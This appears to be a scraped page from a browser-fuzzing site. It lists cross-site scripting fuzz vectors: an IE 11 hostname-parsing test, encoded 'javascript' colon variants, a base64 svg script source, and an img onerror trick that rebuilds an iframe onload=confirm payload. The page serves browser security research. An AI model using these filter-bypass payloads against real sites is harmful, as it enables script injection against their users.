Featured vector

IE 11.0
<a href="/0x30fcgoogle.com" id="fuzzelement1">asdf</a> <script> if(document.getElementById('fuzzelement1').hostname=="google.com") { alert(1); } </script>

Fuzz vector cloud

5,453,920 Successful fuzzes

Fuzz Vectors

Searching for "obfusc"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert